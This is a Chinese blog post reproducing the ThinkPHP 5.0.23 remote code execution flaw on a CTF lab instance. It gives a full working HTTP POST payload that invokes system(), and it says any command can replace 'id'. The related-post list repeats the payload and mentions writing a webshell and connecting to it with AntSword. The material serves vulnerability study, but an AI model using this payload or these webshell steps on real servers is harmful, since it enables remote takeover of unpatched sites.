[ThinkPHP]5.0.23-Rce 漏洞复现

最新推荐文章于 2024-09-08 21:34:39 发布
最新推荐文章于 2024-09-08 21:34:39 发布
阅读量3.9k 收藏 3
点赞数 3
分类专栏: 安全 CTF WEB安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/110818672
版权
安全 同时被 3 个专栏收录
49 篇文章 6 订阅
订阅专栏
CTF
40 篇文章 1 订阅
订阅专栏
WEB安全
38 篇文章 0 订阅
订阅专栏

[ThinkPHP]5.0.23-Rce

环境搭建

github传送门
BUU传送门

POC

在这里插入图片描述
老懒狗选择直接buu,链接

http://node3.buuoj.cn:27512/

直接用poc打一下:

POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:27512
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

直接在burp的repeater模块里面构造就行了:
在这里插入图片描述

exp

这里直接修改id即可,id处可以执行任意代码。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

imbia
关注
专栏目录
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2285
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkphp5.0.23rce复现
Cwillchris的博客
03-13 651
5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
最新发布
Nai_zui_jiang的博客
09-08 340
判断是否存在漏洞:访问/index.php?s=captcha页面,会出现报错。通过echo命令写入 Webshell 文件并把木马进行base64编码。使用HackBar 插件发送 POST 请求。访问shell.php,使用蚁剑连接。启动环境,先关闭其他环境。
thinkphp5-rce
shierbai的博客
05-17 513
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1234
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE
shelter1234567的博客
01-22 1237
本次我们继续以漏洞挖掘者的视角,来分析thinkphpRCE
ThinkPHP5代码审计【RCE
D.MIND 的博客
05-14 1258
composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2546
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
thinkphp 5.0.23 rce漏洞复现
ffff5的博客
05-19 717
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相当多的CMS是在thinkphp基础上二次开发的。 环境搭建 使用vulhub搭建环境,过程不赘述。 漏洞复现 抓包并直接发送下面的流量包,即可利用漏洞进行远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: IP:PORT Accept-Encoding: gzip,
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 973
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2296
记录自己的所学以及理解。
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3363
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
从0学代码审计 | thinkphp 5.0.23 RCE
2301_80127209的博客
12-18 1119
ThinkPHP 是一款开源的 PHP 框架,用于快速、简单地开发 PHP 应用程序。它提供了一套丰富的功能和工具,使开发者能够更容易地构建各种规模的 Web 应用。ThinkPHP 的目标是提高开发效率,同时保持代码的可读性和可维护性。thinkphp的许多版本中也爆出了多个漏洞,本篇文章主要记录thinkphp 5.0.23版本 RCE漏洞复现
ThinkPHP任意代码执行(4-rce
2301_82197189的博客
05-31 214
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 887
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
ThinkPHP6.0.12反序列化RCE挖掘
include_voidmain的博客
07-05 1923
ThinkPHP6.0.12反序列化RCE挖掘
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 674
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
shelter1234567的博客
01-16 1922
本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值